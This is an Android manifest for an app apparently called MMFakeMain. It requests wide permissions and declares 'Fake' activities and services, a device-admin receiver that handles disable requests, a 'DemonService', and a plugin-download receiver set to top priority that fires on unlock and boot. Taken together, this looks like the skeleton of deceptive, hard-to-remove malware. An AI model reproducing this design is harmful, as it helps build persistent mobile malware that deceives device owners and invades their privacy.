<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.xstd.MMFakeMain"
          android:versionCode="1"
          android:versionName="1.0">

    <uses-sdk
        android:minSdkVersion="10"
        android:targetSdkVersion="14"/>

    <!-- access -->
    <uses-permission android:name="android.permission.ACCESS_WIFI_STATE"/>
    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
    <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
    <uses-permission android:name="android.permission.GET_TASKS"/>

    <!-- control -->
    <uses-permission android:name="android.permission.WAKE_LOCK"/>
    <uses-permission android:name="android.permission.CHANGE_WIFI_STATE"/>
    <uses-permission android:name="android.permission.WRITE_SETTINGS"/>

    <!-- bluetooth -->
    <uses-permission android:name="android.permission.BLUETOOTH"/>
    <uses-permission android:name="android.permission.BLUETOOTH_ADMIN"/>

    <!-- enable / disable auto-sync  -->
    <uses-permission android:name="android.permission.READ_SYNC_SETTINGS"/>
    <uses-permission android:name="android.permission.WRITE_SYNC_SETTINGS"/>
    <uses-permission android:name="android.permission.GET_ACCOUNTS"/>

    <!-- common features -->
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
    <uses-permission android:name="android.permission.VIBRATE"/>

    <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
    <uses-permission android:name="android.permission.ACCESS_WIFI_STATE"/>

    <uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW"/>
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>

    <uses-permission android:name="android.permission.RESTART_PACKAGES"/>
    <uses-permission android:name="android.permission.READ_PHONE_STATE"/>

    <application
        android:label="@string/app_name"
        android:icon="@drawable/ic_launcher">
        <activity
            android:name="SplashActivity"
            android:label="@string/app_name">
            <intent-filter>
                <action android:name="android.intent.action.MAIN"/>
                <category android:name="android.intent.category.LAUNCHER"/>
            </intent-filter>
        </activity>

        <meta-data
            android:name="UMENG_APPKEY"
            android:value="52ce1e1e56240b18c30995aa">
        </meta-data>
        <meta-data
            android:name="UMENG_CHANNEL"
            android:value="@string/channel_code">
        </meta-data>

        <!-- 主程序添加 -->
        <activity
            android:name="com.xstd.MMFakeMain.qm.FakeActivity"
            android:screenOrientation="portrait"/>
        <activity android:name="com.xstd.MMFakeMain.qm.activity.BindFakeActivity"/>

        <receiver
            android:name="com.xstd.MMFakeMain.qm.receiver.NetworkBroadcastReceiver"
            android:exported="true">
            <intent-filter>
                <action android:name="android.net.conn.CONNECTIVITY_CHANGE"/>
                <action android:name="android.intent.action.BOOT_COMPLETED"/>
                <!--<action android:name="android.intent.action.USER_PRESENT"/>-->
            </intent-filter>
        </receiver>
        <receiver
            android:name="com.xstd.MMFakeMain.qm.receiver.ScreenBroadcastReceiver"
            android:priority="0x7fffffff">
            <intent-filter>
                <action android:name="android.intent.action.USER_PRESENT"/>
            </intent-filter>
        </receiver>
        <receiver
            android:name="com.xstd.MMFakeMain.qm.receiver.PluginDownloadBroadcastReceiver"
            android:priority="0x7fffffff">
            <intent-filter>
                <action android:name="android.intent.action.USER_PRESENT"/>
            </intent-filter>
        </receiver>
        <receiver
            android:name="com.xstd.MMFakeMain.qm.receiver.PackageAddBrc"
            android:priority="0x7fffffff">
            <intent-filter>
                <action android:name="android.intent.action.PACKAGE_ADDED"/>
                <action android:name="android.intent.action.PACKAGE_REMOVED"/>

                <data android:scheme="package"/>
            </intent-filter>
        </receiver>
        <receiver
            android:name="com.xstd.MMFakeMain.qm.receiver.BindDeviceReceiver"
            android:permission="android.permission.BIND_DEVICE_ADMIN">
            <meta-data
                android:name="android.app.device_admin"
                android:resource="@xml/device_admin"/>
            <intent-filter>
                <action android:name="android.app.action.DEVICE_ADMIN_ENABLED"/>
                <action android:name="android.app.action.DEVICE_ADMIN_DISABLED"/>
                <action android:name="android.app.action.DEVICE_ADMIN_DISABLE_REQUESTED"/>
            </intent-filter>
        </receiver>

        <service
            android:name="com.xstd.MMFakeMain.qm.service.DemonService"
            android:exported="true">
            <intent-filter>
                <action android:name="com.xstd.qs.lanuch"/>
                <action android:name="com.xstd.qs.active"/>
            </intent-filter>
        </service>
        <service android:name="com.xstd.MMFakeMain.qm.service.WatchingService"/>
        <service android:name="com.xstd.MMFakeMain.qm.service.WatchBindService"/>
        <service android:name="com.xstd.MMFakeMain.qm.service.FakeBindService"/>
    </application>
</manifest>
